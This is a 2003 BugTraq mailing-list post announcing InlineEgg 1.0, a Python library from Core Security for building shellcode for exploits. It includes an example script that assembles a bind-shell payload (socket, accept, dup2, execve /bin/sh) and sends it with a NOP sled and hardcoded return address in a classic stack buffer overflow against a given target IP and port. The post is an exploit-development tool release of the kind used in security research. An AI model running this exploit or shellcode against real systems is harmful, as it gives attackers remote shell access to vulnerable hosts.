BugTraq
InlineEgg library release Sep 04 2003 10:35PM
Gerardo Richarte (gera corest com)
We'd like to share with you the release of InlineEgg 1.0. the following
is a reduced version of the
README available at
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html,
the same page points to the .tar.gz

Welcome to InlineEgg.

Short version:

InlineEgg is a collection of python classes (a "library"), that will
help
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using python.

InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a
pretty
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an opensource license for non commercial uses.

Long version:

A simple need: When writing exploits for remote code execution
vulnerabilities
(yes, that's what we do part of the time), you usually need to have
a small
assembly program that will be sent to the vulnerable application as
part of
the exploiting process. Historically, this small pieces of assembly code
(eggs) were hardcoded as dead strings in the middle of the exploit. But,
although having the strings handy gave the exploit writer some
reusability
and some flexibility, we sometimes needed more, we even needed the
possiblity of creating our small assembly programs in runtime, and make
them addapt to the situation... well, there are lots of different
solutions
to the problem, but as I already had some ideas on how to do it, I
jumped
into python.

A simple idea: Do something that lets us create small assembly programs by
concatenating system calls, giving us the possibility of changing the
arguments to the system calls, and adding more code when needed...

[...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

# egg = InlineEgg(FreeBSDx86Syscall)
# egg = InlineEgg(OpenBSDx86Syscall)
egg = InlineEgg(Linuxx86Syscall)

# bind to port and listen
sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
sock = egg.save(sock) # save the socket in a
variable (in stack)
egg.bind(sock, (listen_addr, listen_port)) # sock is now the
variable, and it's used from the stack
egg.listen(sock,1)

client = egg.accept(sock, 0, 0)
client = egg.save(client)
egg.close(sock)

egg.dup2(client, 0)
egg.dup2(client, 1)
egg.dup2(client, 2)
egg.execve('/bin/sh',('bash','-i'))

print "Egg len: %d" % len(egg)
return egg

def main():
if len(sys.argv) < 3:
raise Exception, "Usage: %s <target ip> <target port>"

# connect to target
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], int(sys.argv[2])))

# create egg
egg = listenShellEgg('0.0.0.0',3334)

# exploit

retAddr = struct.pack('<L',0xbffffc24L)
toSend = "\x90"*(1024-len(egg))
toSend += egg.getCode()
toSend += retAddr*20

sock.send(toSend)

main()
---------------------------------------------------------

[...]

InlineEgg:
http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

I hope you find it useful and enjoy it,
gera

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus